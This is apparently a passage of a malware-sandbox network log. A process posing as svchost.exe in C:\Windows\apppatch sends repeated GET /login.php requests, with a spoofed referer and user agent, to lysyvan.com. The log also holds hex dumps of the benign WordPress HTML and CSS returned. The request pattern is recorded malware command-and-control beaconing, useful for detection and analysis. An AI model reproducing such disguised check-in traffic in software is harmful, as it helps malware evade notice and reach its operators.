                                                                                                                                                                                                              2024-11-11 17:33:12 UTC1369INData Raw: 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d
                                                                                                                                                                                                              Data Ascii: ncatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/m
                                                                                                                                                                                                              2024-11-11 17:33:12 UTC1369INData Raw: 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77
                                                                                                                                                                                                              Data Ascii: -description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-w
                                                                                                                                                                                                              2024-11-11 17:33:12 UTC1369INData Raw: 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74
                                                                                                                                                                                                              Data Ascii: webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next
                                                                                                                                                                                                              2024-11-11 17:33:12 UTC1369INData Raw: 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63
                                                                                                                                                                                                              Data Ascii: nt .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-c
                                                                                                                                                                                                              2024-11-11 17:33:12 UTC1369INData Raw: 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d
                                                                                                                                                                                                              Data Ascii: e,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type=


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              3192.168.2.849729188.114.96.34437652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-11 17:33:14 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-11-11 17:33:15 UTC1085INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:15 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              server-timing: amp_sanitizer;dur="46.0",amp_style_sanitizer;dur="22.9",amp_tag_and_attribute_sanitizer;dur="17.1",amp_optimizer;dur="18.5"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qLq82wRQNVpIHvzacho9ZxSgg61RbCRLrnTeOQFqm3ggFGC6zAzXo5Z91YrbZjKk1%2F55pZj1u%2FKvqZse03KhvuTA2iIoxJCOfALMc75RcMNLtEmy8jq8TdZ0U5S03A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1006b5795cafac-NRT
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=155429&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=881&delivery_rate=18630&cwnd=32&unsent_bytes=0&cid=61270023507c636c&ts=1428&x=0"
                                                                                                                                                                                                              2024-11-11 17:33:15 UTC284INData Raw: 37 63 32 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                              Data Ascii: 7c20<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                              2024-11-11 17:33:15 UTC1369INData Raw: 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69
                                                                                                                                                                                                              Data Ascii: "UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!i
                                                                                                                                                                                                              2024-11-11 17:33:15 UTC1369INData Raw: 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 73 69 62
                                                                                                                                                                                                              Data Ascii: touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visib
                                                                                                                                                                                                              2024-11-11 17:33:15 UTC1369INData Raw: 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 3a
                                                                                                                                                                                                              Data Ascii: important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-of-type):
                                                                                                                                                                                                              2024-11-11 17:33:15 UTC1369INData Raw: 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e
                                                                                                                                                                                                              Data Ascii: layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;position
                                                                                                                                                                                                              2024-11-11 17:33:15 UTC1369INData Raw: 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66
                                                                                                                                                                                                              Data Ascii: ne!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;lef
                                                                                                                                                                                                              2024-11-11 17:33:15 UTC1369INData Raw: 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65
                                                                                                                                                                                                              Data Ascii: .i-amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-e
                                                                                                                                                                                                              2024-11-11 17:33:15 UTC1369INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61
                                                                                                                                                                                                              Data Ascii: important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!importa
                                                                                                                                                                                                              2024-11-11 17:33:15 UTC1369INData Raw: 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 61 6d 70 2d 73 74 6f 72 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 3e 61 6d 70 2d 61 6e 61 6c 79 74 69 63 73 7b 70 6f 73 69 74 69 6f 6e 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 76 69 73 69 62 6c 65 2d 77 68 65 6e 2d 69 6e 76 61 6c 69 64 5d 3a 6e 6f 74 28 2e 76 69 73 69 62 6c 65 29 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 65 72 72 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b 64 69 73
                                                                                                                                                                                                              Data Ascii: n!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-accordion{dis


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              4192.168.2.849731188.114.96.34437652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-11 17:33:17 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-11-11 17:33:19 UTC1094INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:18 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              server-timing: amp_sanitizer;dur="44.3",amp_style_sanitizer;dur="19.1",amp_tag_and_attribute_sanitizer;dur="21.1",amp_optimizer;dur="17.8"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZMcpETkdI4nHjMXP%2FDrmQ5ifVjoPo%2F4xu2h4eC7%2B%2BAUvCToUV7HDPEkjlYWIsOmH%2FDbm%2BZDAVaxbrSlCoqfbVpUH7yR5xNh8fK5C4gMh4QOY39eAMnLSoWfelsnZeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1006c97f804328-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1197&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=2505190&cwnd=251&unsent_bytes=0&cid=bb0cb41164c0613d&ts=1421&x=0"
                                                                                                                                                                                                              2024-11-11 17:33:19 UTC275INData Raw: 37 63 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                              Data Ascii: 7c18<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                              2024-11-11 17:33:19 UTC1369INData Raw: 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67
